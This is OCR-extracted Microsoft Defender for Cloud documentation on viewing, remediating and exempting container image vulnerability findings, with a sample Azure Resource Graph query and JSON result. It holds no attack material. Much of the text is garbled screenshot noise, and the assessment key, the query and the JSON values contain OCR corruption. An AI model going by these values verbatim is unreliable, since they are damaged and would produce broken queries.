Home > Microsoft Defender for Cloud 


y= Microsoft Defender for Cloud | Recommendations x 


© Refresh + Download csVreport E Open query EI Governance report A? Guides & Feedback 


@ Azure @ aws @ ccp 


sis À M Attack path > 
ebaz E 35% SALE , A EZI 
@ security alerts Secure score © \ctive recommendations 

@ Inventory 


E Cloud Security Explorer Resource type == None X b Add filter 


2. The recommendation details page opens with additional information. This 
information includes the list of registries with vulnerable images ("affected 
resources") and the remediation steps. Select the affected registry. 


Home > Microsoft Defender for Cloud | Recommendations 


Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) 


x 
GO Exempt © Disable rule G View policy definition E Open query 
Severity Freshness interval Unhealthy registries Total vulnerable images Total vulnerabilities Vulnerabilities by severity 
[Hise © 24 Hours a" (x) 16 Q 454 Critical 38 pe 
Out of 16 scanned High e pa 
Medium 193 mm 
Low 32 pe 
Unknown o 
Container image vulnerability assessment scans your registry for commonly known vulnerabilities (CVEs) and provides a detailed vulnerability report for each image. Resolving vulnerabilities can greatly improve your security posture, ensuring images are safe to use prior to deployment. E 
A Affected resources 
Unhealthy registries (1) Healthy registries (0) Not applicable registries (0) 
My Subscription Scanned Images Vulnerabilities 
CyberSecsoc 16 mu 
A Vulnerabilities 
Active Disabled 


v 
p IT Brempt 


3. This opens the registry details with a list of repositories in it that have vulnerable 
images. Select the affected repository to see the images in it that are vulnerable. 


jer for Cloud | Recommendations > Co! 


contosoregistry01 
Registry security healt 


ntainer registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) 


Total vulnerabilities Vulnerabilities by severity 
(x) 454 Critical m pe 
High 156 pa 


Medium 198 pr 
Low 32 pe 


Unknown o 


Unhealthy repositories (15) Healthy repositories (0) Not applicable repositories (0) 


4. The repository details page opens. It lists all vulnerable images on that repository 


with distribution of the severity of vulnerabilities per image. Select the unhealthy 
image to see the vulnerabilities. 


rosoft Defender for Cloud | Recommendations > Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) 
so-demo/vulnerable-image 


en 


contosoregistry01 


Vulnerabilities by severity 


(x) 163 Critical 147 pe 


High A pe 
Medium 7) pr 
Low 20 pa 


Unknown o 


Unhealthy images (1) Healthy images (0) Not applicable images (0) 


[E Search to filter items. 


Scan Report Time ty. 


Os type Ta 


Tags Ty 


Artifact media type Ty Vulnerabilities t4 € ) 
latest application/vnd.docker.distribution.manifest.v2+json — ra 


22470. 7/2/2023, 7:58 AM GMT+3 linux 


5. The list of vulnerabilities for the selected image opens. To learn 


more about a 
finding, select the finding. 


Home > Microsoft Defender for Cloud | 


Recommendations > Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) > contosoregistry01 > mdc-contoso-demo/vulnerable-image 


271282ecaa77 x 
Image security health 
a 
Total vulnerabilities Vulnerabilities by severity 
OO 163 Critical 17 mm 
High 7 
Medium 79 M 
Low 20 mm 
Unknown o 
A Essentials 
Image Uri contosoregistry01.azurecr.io/mdc-contoso-demo/vulnerable-image@sha256:271282ec2a7728ceb618515e389ce92bc884ee2.. 
Digest sha256:271282ecaa7728ceb618515e389ce92bc884ee24f03ba65bf134d85f72286279 
Tags latest 
os Linux 
OS Distribution : Debian 8 
See more 
Vulnerabi Disabled findings 
[2 Search to filter items. ] 
Severity CVE Fix status Packages type Vendor Installed version Package Name Fixed version 
Critical CVE-2019-11047 FixAvailable os debian 5.6.30+dfsg-0+deb8u1 phps 5,6.40+dfsg-0+deb8us 
Critical ‘CVE-2019-9641 FixAvailable os debian 5.6.30+dfsg-0+deb8u1 phps 5.6.40+dfsg-O+dg 
Critical ‘CVE-2019-9639 FixAvailable os debian 5.6.30+dfsg-0+deb8u1 phps 5,6.40+dfsg-0+ GebBu2 
Critical ‘CVE-2019-9638 FixAvailable os debian 5.6.30+dfsg-0+deb8u1 phps 5,6.40+dfsg-0+deb8Us 
Critical CVE-2020-10188 FixAvailable os debian 2:1,9.2.39,3a460-3 inetutils 2:1,9,2.39,3a460-3+deb8u1 


6. The vulnerabilities details pane opens. This pane includes a detailed description of 


the issue and links to external resources to help mitigate the threats, affected 


resources, and information on the software version that contributes to resolving 


the vulnerability. 


Home > Microsoft Defender for Cloud | 


271282ecaa77 


Image security health 


Total vulnerabilities 


OO 163 


A Essentials 

image Uri contosoregistry01.a7 
sha256.271282ecaa7’ 
latest 

Linux 


Debian 8 


Disabled findings 


jer items. 


Recommendations > Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) > con) CVWE-2019-11047 


Vulnerabilities by severity 
Critical i pe 

High a pe 
Medium m rr 
Low 20 pa 


Unknown o 


cebő18515e389ce92bc884ee24f03ba65bf134d85f72286279 


rio/mdc-contoso-demo/vulnerable-image@sha256:271282ecaa7728ceb618515e389ce92bc884ee2. 


Other details 

Package type os 

Vendor debian 

Package name phps 

Installed version 5.6.30+dfsg-0+deb8u1 
Fixed version 5.6.40+dfsg-0+debsus 


CVSS vector CVSS:3.0/AV:N/AC:L/PR:N/ULN/S:U/CH/:N/AH/E..|l 


Other references 


https://nvd.nist.gov/vuln/detail/CVE-2019-11047 


https; 
MZ 

Remediation/patch details 
Create new image with updated package php5 with version 5.5.40+dfsg-0+deb8u8 


or higher. 


v Exploitability 


Severity 
Critical 
Critical 
Critical 
Critical 
Critical 


Critical 


CVE 


CVE-2019-11047 


CVE-2019-9641 


-2019-9640 


CVE-2019-9639 


Fix status 


FixAvailable 


Fixavailable 


Fixavailable 


Fixavailable 


Fixavailable 


Fixavailable 


Packages type 


Vendor 
debian 
debian 
debian 
debian 
debian 


debian 


Installed versic CPE 


56.30+dfsg-0| v Evidence 


5.6.30+df5g-04 ~ Affected resources 


0+disg-04 


Digest os Vendor Repository host 
56.30+dfsg-0:l 
B 271282ecaa77 linux debian mdc-contosi y 


5.6.30+dfsg-04} 
d 


EEE 


View images affected by a specific vulnerability 


1. Open the Recommendations page. If issues were found, you'll see the 


recommendation Container registry images should have vulnerability findings 


resolved (powered by MDVM) £. Select the recommendation. 


Home > Microsoft Defender for Cloud 


y= Microsoft Defender for Cloud | Recommendations 
TT Showing subscription ‘CyberSecSOC 


Bam) 


General 


© Refresh d Download CSV report $ Open query E Governance report A? Guide 


Secure score recommendations All recommendations 


© overview 


@ Getting started 


Recommendations 


176/249 


Attack path analysis 


© 35% 


> 


Secure score © Active recommendations 


Security alerts 


to) 
AA 
© inventory 
LA 
a 


ee 


@ Azure @ aws @ ccp 


Cloud Security Explorer Recommendation status == None X Severity == None X — Resourcetype==None X ty Add filter ~ More (3) Show my items only: ) 
Workbooks 
e Community © Name ty Max score A  Currentscore TA Potential sc Status Ty Unhealthy resources 
EEE E Secure managanent pore 2 SPRI +5% = Overdue 27 of 181 resources = 
WV Remediate vulnerabilities 6 + 4% © Overdue 61 of 206 resources ee 
Cloud Security 
E Machines should have a vulnerability assessment soluti © Overdue B 
Security posture 
T e Machines should have vulnerability findings resolved © Overdue e 
Regulatory compliance 
ECZ instances should have vulnerability findings resolved Unassigned giarra -= 


D workload protections 
E Firewall Manager 


© DevOps security (preview) 


© Ontime @ 2 of 2 cdi 


On time 


ay i * Completed 0 of 2 Kubermetes services =u 
lanagement 

v 
mE BEE jol * Ontime E 2 of 3 Kubernetes - Azur... mmm 
Albiz a a hi ee b 


2. The recommendation details page opens with additional information. This 


information includes the list of vulnerabilities impacting the images. Select the 


specific vulnerability. 


Home > Microsoft Defender for Cloud | Recommendations 


Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) 


© Exempt © disable rule Gi View policy definition E Open query 


Severity Freshness interval Unhealthy registries Total vulnerable images Total vulnerabilities Registries with most vulnerabilities 
[High ®© 24 Hours AN 171 (x) 16 OO 454 contosoregistry01 
Out of 16 scanned 
O a contosoregistryo1 Cybersecsoc 16 
A Vulnerabilities 
Active Disabled 
Severity N vE My Applies to 


Critical CVE-2022-2; 7 of 16 scanned images 
Critical CVE-2021- 6 of 16 scanned images 
Critical CVE-2017-1000158 5 of 16 scanned images 


Vulnerabilities by severity 


454 Critical 38 mmm 
High 1350 mm 
Medium 193 mmm 
Low 32 pe 


Unknown o 


a 


3. The vulnerability finding details pane opens. This pane includes a detailed 


description of the vulnerability, images affected by that vulnerability, and links to 


external resources to help mitigate the threats, affected resources, and information 


on the software version that contributes to resolving the vulnerability. 


Home > Microsoft Defender for Cloud | Recommendations 


Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerabili 


© Exempt O Disable rule Gi View policy definition E Open query 


Severity Freshness interval Unhealthy registries Total vulnerable images Total vulnerabilities Registries with most y 
[High © 24 Hours a IZO (x) 16 [x] 454 contosoregistry01 
Out of 16 scanned 
DI a contosoregistryot Cybersecsoc 16 
^ Vulnerabilities 
Active Disabled 
fiter items. 
Severity TL E Tu Applies to 
Critical CVE-2021-3711 8 of 16 scanned im] 
Critical CVE-2022-28391 7 of 16 scanned im 
Critical CVE-2021-36159 6 of 16 scanned iml 
Critical CVE-2017-1000158 5 of 16 scanned im] 
Critical CVE-2016-0718 5 of 16 scanned im] 


Remediate vulnerabilities 


CVE-2021-3711 


Description 


This vulnerability affects the following vendors: 
Openssl, Debian, Netapp, Oracle, Tenable, Microsoft, 
Ubuntu, Suse, Alpine. To view more details about this 
vulnerability please visit the vendor website 


A General Information 


Date published 24/2021, 3:00 AM GMT+3 


Last modified date 3:00 AM GMT+3 
Fix status FixAvailable 
Severity Critical 
CVSS score 98 


CVSS version 


V Additional information 
Exploital 


Affected resources 


Digest os Vendor Repository 


Registry host 

kas-goat-syste.f bs 
kas-goat-inter..9 E 
Contosoregistry.. 


contosoregistry. 


a3aae97c994c linux ubuntu 


300c90c21068 linux alpine 


fesafeBied67 linux ubuntu kas-goat-hung 


002079762515 linux alpine k8s-goat-info-. 


Use these steps to remediate each of the affected images found either in a specific 


cluster or for a specific vulnerability: 
1. Follow the steps in the remediation section of the recommendation pane. 


2. When you've completed the steps required to remediate the security issue, replace 
each affected image in your registry or replace each affected image for a specific 
vulnerability: 

a. Build a new image (including updates for each of the packages) that resolves 
the vulnerability according to the remediation details. 

b. Push the updated image to trigger a scan and delete the old image. It may take 
up to 24 hours for the previous image to be removed from the results, and for 


the new image to be included in the results. 


3. Check the recommendations page for the recommendation Container registry 
images should have vulnerability findings resolved (powered by MDVM) £ . If the 
recommendation still appears and the image you've handled still appears in the list 
of vulnerable images, check the remediation steps again. 


Next steps 


e Learn how to view and remediate vulnerabilities for images running on Azure 
Kubernetes clusters. 
e Learn more about the Defender for Cloud Defender plans. 


View and remediate vulnerabilities for 
images running on your AKS clusters 


Article e 09/06/2023 


Defender for Cloud gives its customers the ability to prioritize the remediation of 
vulnerabilities in images that are currently being used within their environment using 
the Running container images should have vulnerability findings resolved Z 


recommendation. 


To provide findings for the recommendation, Defender for Cloud uses agentless 
discovery for Kubernetes or the Defender agent to create a full inventory of your 
Kubernetes clusters and their workloads and correlates that inventory with the 
vulnerability reports created for your registry images. The recommendation shows your 
running containers with the vulnerabilities associated with the images that are used by 
each container and remediation steps. 


Defender for Cloud presents the findings and related information as recommendations, 
including related information such as remediation steps and relevant CVEs. You can view 
the identified vulnerabilities for one or more subscriptions, or for a specific resource. 


Within each recommendation, resources are grouped into tabs: 


e Healthy resources — relevant resources, which either aren't impacted or on which 
you've already remediated the issue. 

e Unhealthy resources — resources that are still impacted by the identified issue. 

e Not applicable resources — resources for which the recommendation can't give a 
definitive answer. The not applicable tab also includes reasons for each resource. 


If you are using Defender CSPM, first review and remediate vulnerabilities exposed via 
attack paths, as they pose the greatest risk to your security posture. Then use the 
following procedures to view, remediate, prioritize, and monitor vulnerabilities for your 


containers. 


View vulnerabilities on a specific cluster 
To view vulnerabilities for a specific cluster, do the following: 


1. Open the Recommendations page, using the > arrow to open the sub-levels. If 
issues were found, you'll see the recommendation Running container images 
should have vulnerability findings resolved (powered by Microsoft Defender 
Vulnerability Management) £ . Select the recommendation. 


Home > Microsoft Defender for Cloud 


<= Microsoft Defender for Cloud | Recommendations 


wing subscription 'CyberSecSOC 


[2 Search | © Refresh d Download CSV report PS Open query EI Governance report 8? Guides & Feedback 
General a 

Secure score recommendations A recommendations 
D Overview ja 


@ Getting started 


ZZ Recommendations 


@ Azure O AWS O GCP 


M More (4) 


v— 
© Attack path analysis 9 39% v= 53/83 18 Attack path 
` 7 > With the riskiest recommendations. Open > (i 
© Security alerts Secure score () Active recommendations 
@ Inventory 
B Goud Security Explorer Search recommendations Recommendation status == None X Severity == None X Tz Add filter 
@ Workbooks 
& Community © Name ty Max score ^4 
@ Diagnose and solve problems ba Remediate vulnerabilities 6 1.64 OF 
Cloud Security Container registry images should have vulnerability findings resolved (powered by Qualys) 
© Security posture Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) 
julatory compliance ure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes ziala 
Regulatory compl Azure Kubernetes Sı hould have the Azure Policy add-on for Kub stalled 
O Workload protections Container images should be deployed from trusted registries only 
E Firewall Manager Running container images should have vulnerability findings resolved (powered by Qualys) 
E DevOps security (preview) Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) 


Current score Ty, 


O GitHub O Gitlab 


Show my items only: 


O AzureDevOps 


GIA 


Potential score increase TL Statt 


+ 8% 


2. The recommendation details page opens showing the list of Kubernetes clusters 


("affected resources") and categorizes them as healthy, unhealthy and not 


applicable, based on the images used by your workloads. Select the relevant 


cluster for which you want to remediate vulnerabilities. 


Home > Microsoft Defender for Cloud | Recommendations 


Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) 


@® Exempt G View policy definition E Open query 


Severity Freshness interval 


ign @ 30min 


A Description 


Container image vulnerability assessment scans your registry for commonly known vulnerabilities (CVEs) and provides a detailed vulnerability report for each image. This recommendation provides visibility to vulnerable images currently running in your Kubernetes clusters. Remediating 


vulnerabilities in container images that are currently running is key to improving your security posture, significantly reducing the attack surface for your containerized workloads, 
\ Remediation steps 
A Affected resources 

Unhealthy resources (1) Healthy resources (0) Not applicable resources (1) 


[O Search azure resources 


E Name My Subscription Owner 4 Due date 


CyberSecSOC demo@demo.com 7/21/2023 


Status 


* Ontime 


M Last change) SA 


21/06/21 


3. The cluster details page opens. It lists all currently running containers categorized 


into three tabs based on the vulnerability assessments of the images used by those 


containers. Select the specific container you want to explore. 


Home > Microsoft Defender for Cloud | Recommendations > Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) 


contoso-aks-prd x 
Total vulnerabilities Vulnerabilities by severity Freshness interval Inventory source 
OO 450 Critical 38 pe © 24 Hours Agentless 
High 183 BK 
Medium 193 ET 
Low 31 KE 
Unknown o 
Unhealthy images (8) Healthy images (6) Not applicable images (20) 
| © Search to filter items. 7 
Name ty Last Scan Ty OS type Ty Container name îy Pod name îy Controller name y Controller type Ty Namespace Ty. Vulnerabilit 
7/4/2023, 11:10 AM G... linux system-monitor system-monitor-deplo... system-monitor-deplo... ReplicaSet default per: 
E contosoregistry01.azurecr.... 7/4/2023, 11:10 AM G... linux hello-kubernetes-vuln... dfd-demo mdc-contoso-demo — 
 contosoregistry01.azurecr.... 7/4/2023, 11:10 AM G... linux hello-kubernetes-vuln..._ release-3-66cffc5457-.,. release-3-66cffc5457 ReplicaSet mdc-contoso-demo KE ETZ 
 contosoregistry01.azurecr.... 7/4/2023, 11:10 AM G... linux hello-kubernetes-vuln... release-3-66cffc5457-s... release-3-66cffc5457 ReplicaSet mdc-contoso-demo EE m 


4. This pane includes a list of the container vulnerabilities. Select each vulnerability to 


resolve the vulnerability. 


Home > contoso-aks-prd > 


a3aae97c994c x 


Image security 


Total vulnerabilities Vulnerabilities by severity Freshness interval Inventory source 


(x) 177 Critical 1 m © 24 Hours Agentless 
High e m 
Medium e pr 
Low 10 = 


Unknown o 


A Essentials 

Image Uri contosoregistry01.azurecr.io/k8s-goat-system-monitor@sha256:a3aae97c994ca36c1c7f1cd4935... 
Digest sha256:a3aae97c994ca36c1c7f1cd49354206229685b725c4c1c0a23b823599b2211bf 

Tags latest 

os Linux 


OS Distribution : Ubuntu Linux 18.04 


Active Vulnerabilities (432) Disabled Vulnerabilities (0) Active Containers (1) 


[A Search to filter items. 


Patch available 1, Package type Ty, Vendor ty, Package Name Ty 


Severity Ty CVE Installed version Ty, Fixed version T4 

Critical CVE-2020-10543 true os ubuntu 5.26.1-6ubuntu0.3 perl-base 5.26.1-6ubuntu0.5 Q 
Critical CVE-2020-10878 true os ubuntu 5.26.1-6ubuntu0.3 perl-base 5.26.1-6ubuntu0.5 

Critical CVE-2021-3711 true os ubuntu 1.1.1-Tubuntu2.1~18.0.... openssl 1.1.1-1ubuntu2.1~18.04.13 


View container images affected by a specific 
vulnerability 


To view findings for a specific vulnerability, do the following: 


1. Open the Recommendations page, using the > arrow to open the sub-levels. If 
issues were found, you'll see the recommendation Running container images 
should have vulnerability findings resolved (powered by Microsoft Defender 
Vulnerability Management) £ . Select the recommendation. 


Home > Microsoft Defender for Cloud 


= Microsoft Defender for Cloud | Recommendations x 


yberSecSOC 


J subscription 


[es | © Refresh L Download CSV report "$ Open query [7] Governance report Æ? Guides & Feedback 
General a 
Secure score recommendations A recommendations 

D Overview diek 
@ Getting started @ Azure Oas OSO O GitHub O Gitlab O AzureDevOps 

Recommendations 

Zee 
© Attack path analysis 9 39% Y= 53/83 185 Axran 
> With the riskiest recommendations. Open> E 
D Security alerts Secure score 0) Active recommendations 
@ Inventory 
Br chelsea Search recommendations Recommendation status == None X Severity == None X ty Add filter More (4) Show my items only: gra 
Zi Workbooks 
a Community © Name ty Max score A Current score ty, Potential score increase Ty Statt 
& Diagnose and solve problems W Remediate vulnerabilities 6 1.64 BI +8% .a 
Cloud Security Container registry images should have vulnerability findings resolved (powered by Qualys) . 
‘ontainer registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) . 

© Security posture c id hi lity findi ved sd by Microsoft Defender Vulnerability M ) 

Regulatory compliance Azure Kubemetes Service clusters should have the Azure Policy add-on for Kubernetes installed . 

adan compl 
Q Workload protections Container images should be deployed from trusted registries only Q: 
=% Firewall Manager Running container images should have vulner: ings resolved (powered by Qualys) b 
E DevOps security (preview) "© 

v 


The recommendation details page opens with additional information. This 


information includes the list of vulnerabilities impacting the clusters. Select the 


specific vulnerability. 


Home > Microsoft Defender for Cloud | Recommendations 


Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management) 


© Exempt © disabl efinition E Open query 
Severity Unhealthy clusters Total vulnerabilities h 
ME gee (x 


3. The vulnerability details pane opens. This pane includes a detailed description of 
the vulnerability, images affected by that vulnerability, and links to external 
resources to help mitigate the threats, affected resources, and information on the 
software version that contributes to resolving the vulnerability. 


Home > Microsoft Defender for Cloud | Recommendations 


CVE-2021-3711 
Running container images should have vulnerability findings rest 


© Exempt © Disable rule G View policy definition E Open query 


vendors: Openssl, Debian, Netapp, Oracle, Tenable, Microsoft, Ubuntu, Suse, 


Severity Freshness int terval Unhealthy clusters Total vulnerabl Inerability please visit the vendor website. 
| High © 24Hours PP. 1/2 On 
Geo 
Out of 14 scann A General Information 
Date published 8/24/2021, 3:00 AM GMT+3 
6/13/2023, 3:00 AM GMT+3 
Fix ilable 
critical 
Remediati steps 98 
Affected resources 3.0 
Vulnerabiliti. 
v Additional information 
Acti Disabled 
v Exploitability 
[2 Search to filter it 
Affected resources 
Severity ty 
Critical 


Remediate vulnerabilities 


Use these steps to remediate each of the affected images found either in a specific 
cluster or for a specific vulnerability: 


1. Follow the steps in the remediation section of the recommendation pane. 

2. When you've completed the steps required to remediate the security issue, replace 
each affected image in your cluster, or replace each affected image for a specific 
vulnerability: 

a. Build a new image (including updates for each of the packages) that resolves 
the vulnerability according to the remediation details. 

b. Push the updated image to trigger a scan and delete the old image. It may take 
up to 24 hours for the previous image to be removed from the results, and for 
the new image to be included in the results. 


c. Use the new image across all vulnerable workloads. 


3. Check the recommendations page for the recommendation Running container 
images should have vulnerability findings resolved Z. 

4. If the recommendation still appears and the image you've handled still appears in 
the list of vulnerable images, check the remediation steps again. 


Next steps 


e Learn how to view and remediate vulnerabilities for registry images. 
e Learn more about the Defender for Cloud Defender plans 


Create exemptions and disable vulnerability assessment 
findings on Container registry images and running images 


Article e 07/31/2023 


© Note 


You can customize your vulnerability assessment experience by exempting management groups, subscriptions, or specific resources 


from your secure score. Learn how to create an exemption for a resource or subscription. 


If you have an organizational need to ignore a finding, rather than remediate it, you can optionally disable it. Disabled findings don't affect 
your secure score or generate unwanted noise. 


When a finding matches the criteria you've defined in your disable rules, it doesn't appear in the list of findings. Typical scenario examples 
include: 


e Disable findings with severity below medium 


e Disable findings for images that the vendor will not fix 


© Important 


To create a rule, you need permissions to edit a policy in Azure Policy. Learn more in Azure RBAC permissions in Azure Policy. 


You can use a combination of any of the following criteria: 


e CVE - Enter the CVEs of the findings you want to exclude. Ensure the CVEs are valid. Separate multiple CVEs with a semicolon. For 
example, CVE-2020-1347; CVE-2020-1346. 

e Image digest - Specify images for which vulnerabilities should be excluded based on the image digest. Separate multiple digests with 
a semicolon, for example: 
sha256 : 9b920e938111710c2768b31699aac9d1ae80ab6284454e8a9FF42e887Faldb31 ; sha256 : abOab32F75988da9b146de7a3589c47e919393ae51bbf2d 
8a0d55dd92542451c 

e OS version - Specify images for which vulnerabilities should be excluded based on the image OS. Separate multiple versions with a 
semicolon, for example: ubuntu_linux_20.04;alpine_3.17 

e Minimum Severity - Select low, medium, high, or critical to exclude vulnerabilities less than and equal to the specified severity level. 

e Fix status - Select the option to exclude vulnerabilities based on their fix status. 


Disable rules apply per recommendation, for example, to disable CVE-2017-17512 % both on the registry images and runtime images, the 


disable rule has to be configured in both places. 


© Note 


The Azure Preview Supplemental Terms Z include additional legal terms that apply to Azure features that are in beta, preview, or 
otherwise not yet released into general availability. 


To create a rule: 


1. From the recommendations detail page for Container registry images should have vulnerability findings resolved powered by 
Microsoft Defender Vulnerability Management’ or Running container images should have vulnerability findings resolved powered by 
Microsoft Defender Vulnerability Management ”, select Disable rule. 


2. Select the relevant scope. 
3. Define your criteria. You can use any of the following criteria: 


e CVE - Enter the CVEs of the findings you want to exclude. Ensure the CVEs are valid. Separate multiple CVEs with a semicolon. 

For example, CVE-2020-1347; CVE-2020-1346. 
e Image digest - Specify images for which vulnerabilities should be excluded based on the image digest. Separate multiple digests 

with a semicolon, for example: 

sha256:9b920e938111710c2768b31699aac9d 1ae80ab6284454e8a9ff42e887fal1db31;sha256:ab0ab32f75988da9b146de7a3589c47e9193 
e OS version - Specify images for which vulnerabilities should be excluded based on the image OS. Separate multiple versions 

with a semicolon, for example: ubuntu_linux_20.04;alpine_3.17 


e Minimum Severity - Select low, medium, high, or critical to exclude vulnerabilities less than and equal to the specified severity 


level. 
e Fix status - Select the option to exclude vulnerabilities based on their fix status. 


4. In the justification text box, add your justification for why a specific vulnerability was disabled. This provides clarity and understanding 


for anyone reviewing the rule. 


5. Select Apply rule. 


Home > Microsoft Defender for Cloud | Recommendations Disable rule 
Running container images should have vulnerability findings resolved (powered by Micro: Ir 


Severity Freshness interval Unhealthy clusters Total vulnerable images 


High 24 Hours EE 9 291 
| ši © EGO a2 (x) (x) Showing 1 - 4 of 4 results, 


Out of 14 scanned 


1 subscriptions) 


E View policy definition E Open query 
1 of 1 subscriptions) 


Total vulnerabiliti Cybersecsoc 


Disable Action 


Disable findings that match any of the following criteria: 


Parameters 
~ Affected resources CEs © 
Unhealthy clusters (1) Healthy clusters (0) Not applicable clusters (1) image Digest © 
= OS version © 
E Name Ty Subscription 
E ge contoso-aks-prd CyberSecsoC besre 
None v 


A Vulnerabilities 
Justification (optional) 


Active Disabled 


D Search to filter items, 


Severity SA CVE 


Trigger logic app 


@ New disable rules applied to a subscription might take up to 30 minutes to take effect, New rules on a management group migi 
take up to 24 hours. Disabling rule on the MG will apply/override any rules that may exist on underlying subscriptions 


er Tzi 


@ Important 


Changes might take up to 24 hours to take effect. 


To view, override, or delete a rule: 
1. From the recommendations detail page, select Disable rule. 
2. From the scope list, subscriptions with active rules show as Rule applied. 
3. To view or delete the rule, select the ellipsis menu ("..."). 


4. Do one of the following: 


e To view or override a disable rule - select View rule, make any changes you want, and select Override rule. 


e To delete a disable rule - select Delete rule. 


Disabled findings 


Parameters 
CVEID © 


Image Digest © 
OS version © 

Ubuntu | 
Minimum severity © 


None bai | 
Fix Status © 

None Vv | 
Justification (optional) 


Next steps 


e Learn how to view and remediate vulnerability assessment findings for registry images. 


e Learn about agentless container posture. 


Container vulnerability assessments 
REST API 


Article e 09/18/2023 


Overview 


Azure Resource Graph (ARG) provides a REST API that can be used to pragmatically 
access vulnerability assessment results for both Azure registry and runtime 
vulnerabilities recommendations. Learn more about ARG references and query 
examples. 


Azure container registry vulnerabilities sub assessments are published to ARG as part of 
the security resources. For more information, see: 


e Security Resources ARG Query Samples 
e Generic Security Sub Assessment Query 


ARG query examples 


To pull specific sub assessments, you need the assessment key. For Container 
vulnerability assessment powered by MDVM the key is c@b7cfc6-3172-465a-b378- 
53c7ff2cced5. 


The following is a generic security sub assessment query example that can be used as an 
example to build queries with. This query pulls the first sub assessment generated in the 
last hour. 


kql 


securityresources 

| where type =~ "microsoft.security/assessments/subassessments" and 
properties.additionalData.assessedResourceType == 
"AzureContainerRegistryVulnerability" 

| extend assessmentKey=extract(@"(? 
i)providers/Microsoft.Security/assessments/([^/]*)", 1, id) 

| where assessmentKey == "c@b7cfc6-3172-465a-b378-53c7ff2cc@d5" 

| extend timeGenerated = properties.timeGenerated 

| where timeGenerated > ago(1h) 


Query result 


JSON 


siders 
"/subscriptions/{SubscriptionId}/resourceGroups/{ResourceGroup}/providers/Mi 
crosoft.ContainerRegistry/registries/{Registry 
Name}/providers/Microsoft.Security/assessments/c@b7cfc6-3172-465a-b378- 
53c7ff2cc@d5/subassessments/{SubAssessmentId}", 


"name": "{SubAssessmentId}", 

"type": "microsoft.security/assessments/subassessments”, 
"tenantId": "{TenantId}", 

ekinda: Ura 

degra d globals, 

"pesourceGroup": "“{ResourceGroup}", 

"“subscriptionId": "{SubscriptionId}", 

"managedBy": "" 

“Sky's null, 

"plan": null, 


"properties": { 
"id": "CVE-2022-42969", 
"additionalData": { 
"assessedResourceType": "AzureContainerRegistryVulnerability", 
"vulnerabilityDetails": { 
"severity": "High", 
"exploitabilityAssessment": { 
"exploitStepsPublished": false, 
"exploitStepsVerified": false, 
"isInExploitKit": false, 
"exploitUris": [], 
"types": [ 
"Remote" 
] 
J 
"lastModifiedDate": "2023-09-12T00:00:00Z", 
"publishedDate": "2022-10-16T06:15:00Z", 
"workarounds": [], 
"references": [ 


{ 

"title": "CVE-2022-42969", 

"link": “https://nvd.nist.gov/vuln/detail/CVE-2022-42969" 
Jo 
{ 


"title": "oval:org.opensuse.security:def:202242969", 

KNK 
"https://ftp.suse.com/pub/projects/security/oval/suse.linux.enterprise.serve 
m15. xml. gz: 

Jo 
{ 


"title": "oval:com.microsoft.cbl-mariner:def:11166", 
"link": "https://raw.githubusercontent.com/microsoft/CBL- 
MarinerVulnerabilityData/main/cbl-mariner-1.0-oval.xml" 
b 
{ 


"title": "ReDoS in py library when used with subversion ", 
"link": "https://github.com/advisories/GHSA-w596-4wvx-j9j6" 
} 
lle 


"weaknesses": { 


dida Egeo 


d 
“cvelId": "CVE-2022-42969", 
HSE af 
2 Oa Ri 
(Glez) 
"cvssVectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", 
"base": 7.5 


"cpe": { 
"language": "*", 
"softwareEdition": "*", 
paira kuia 
“targetHardware": "*", 
"“targetSoftware": "python", 
"vendor": "py", 
seditione (Gia 
"product": "py", 
“Ufone sg ani, 
Soothers ara, 
"part": "Applications", 
Uri Eepe: 23a Py Py MER 
b 
ba 
“artifactDetails”: { 
"LastPushedToRegistryUTC": "2@23-09-04T16:05:32.8223098Z", 
"repositoryName": “public/azureml/aifx/stable-ubuntu20e04-cu117- 
py39-torch20e0e", 
"registryHost": "“ptebic.azurecr.io", 
"artifactType": "ContainerImage", 
"mediaType": 
"application/vnd.docker.distribution.manifest.v2+json", 
"digest": 
"sha256:4af8e6f002401a965bbe753a381af308b40d8947fad2b9e1f6a369aa8labee59", 
"tags": [ 
"biweekly. 202309.1" 
] 
b 
"softwareDetails": { 
"category": "Language", 
"language": "python", 
"fixedVersion"™: "" 
versions: =1.11.0.05, 
"vendor": "py", 


"packageName": "py", 
“osDetails": { 
"osPlatform": "linux", 
"osVersion": “ubuntu_linux_20.04" 
Jo 
"fixStatus": "FixAvailable", 
"evidence": [] 
Jo 
"cvssV30Score": 7.5 
Fo 
"description": “This vulnerability affects the following vendors: 
Pytest, Suse, Microsoft, Py. To view more details about this vulnerability 
please visit the vendor website.", 
"displayName": "CVE-2022-42969", 
"resourceDetails": { 

"id": "/repositories/public/azureml/aifx/stable-ubuntu2004-cu117- 
py39- 
torch200/images/sha256:4af8e6f002401a965bbe753a381af308b40d8947fad2b9e1f6a36 
9aa81abee59", 


"source": "Azure" 
Jo 
"timeGenerated": "2023-09-12T13:36:15.0772799Z", 
"remediation": “No remediation exists", 
Estatus: { 
"description": "Disabled parent assessment", 
"severity": "High", 
"code": "NotApplicable", 
"cause": "Exempt" 
} 
KO 
"tags": null, 


"identity": null, 

"zones": null, 

"extendedLocation": null, 

"assessmentKey": "c@b7cfc6-3172-465a-b378-53c7ff2cc0d5", 
"timeGenerated": "2023-09-12T13:36:15.0772799Z" 


} 
] 
Definitions 
Name Description 
AzureResourceDetails Details of the Azure resource that was assessed 


AzureContainerVulnerability More context fields for container registry Vulnerability assessment 
CVE CVE Details 


CVSS CVSS Details 


Name 
SecuritySubAssessment 
